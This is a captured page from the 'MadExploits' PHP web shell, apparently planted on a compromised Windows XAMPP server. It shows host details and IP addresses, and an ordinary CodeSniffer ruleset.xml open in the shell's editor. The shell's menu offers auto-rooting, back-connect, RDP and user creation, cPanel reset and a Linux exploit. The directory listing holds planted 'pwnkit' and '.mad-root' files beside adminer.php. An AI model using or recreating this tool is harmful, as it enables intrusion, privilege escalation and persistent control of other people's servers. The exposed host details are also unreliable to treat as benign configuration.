Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
CodeSniffer /
Standards /
Squiz /
[ HOME SHELL ]
Name
Size
Permission
Action
Docs
[ DIR ]
drwxrwxrwx
Sniffs
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
ruleset.xml
2.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ruleset.xml
<?xml version="1.0"?> <ruleset name="Squiz"> <description>The Squiz coding standard.</description> <!-- Include some specific sniffs --> <rule ref="Generic.CodeAnalysis.UnusedFunctionParameter"/> <rule ref="Generic.Commenting.Todo"/> <rule ref="Generic.ControlStructures.InlineControlStructure"/> <rule ref="Generic.Formatting.DisallowMultipleStatements"/> <rule ref="Generic.Formatting.SpaceAfterCast"/> <rule ref="Generic.Functions.FunctionCallArgumentSpacing"/> <rule ref="Generic.NamingConventions.ConstructorName"/> <rule ref="Generic.NamingConventions.UpperCaseConstantName"/> <rule ref="Generic.PHP.DisallowShortOpenTag"/> <rule ref="Generic.Strings.UnnecessaryStringConcat"/> <rule ref="Generic.WhiteSpace.DisallowTabIndent"/> <rule ref="Generic.WhiteSpace.ScopeIndent"/> <rule ref="PEAR.ControlStructures.MultiLineCondition"/> <rule ref="PEAR.Files.IncludingFile"/> <rule ref="PEAR.Formatting.MultiLineAssignment"/> <rule ref="PEAR.Functions.FunctionCallSignature"/> <rule ref="Zend.Debug.CodeAnalyzer"/> <!-- Lines can be 85 chars long, but never show errors --> <rule ref="Generic.Files.LineLength"> <properties> <property name="lineLimit" value="85"/> <property name="absoluteLineLimit" value="0"/> </properties> </rule> <!-- Use Unix newlines --> <rule ref="Generic.Files.LineEndings"> <properties> <property name="eolChar" value="\n"/> </properties> </rule> <!-- Have 8 chars padding maximum and always show as errors --> <rule ref="Generic.Formatting.MultipleStatementAlignment"> <properties> <property name="maxPadding" value="8"/> <property name="ignoreMultiLine" value="true"/> <property name="error" value="true"/> </properties> </rule> <!-- Tweaks to metrics --> <rule ref="Generic.Metrics.CyclomaticComplexity"> <properties> <property name="complexity" value="10"/> <property name="absoluteComplexity" value="100"/> </properties> </rule> <rule ref="Generic.Metrics.NestingLevel"> <properties> <property name="nestingLevel" value="5"/> <property name="absoluteNestingLevel" value="50"/> </properties> </rule> <!-- We don't want gsjlint throwing errors for things we already check --> <rule ref="Generic.Debug.ClosureLinter"> <properties> <property name="errorCodes" type="array" value="0210"/> <property name="ignoreCodes" type="array" value="0001,0110,0240"/> </properties> </rule> <rule ref="Generic.Debug.ClosureLinter.ExternalToolError"> <message>%2$s</message> </rule> </ruleset>
Close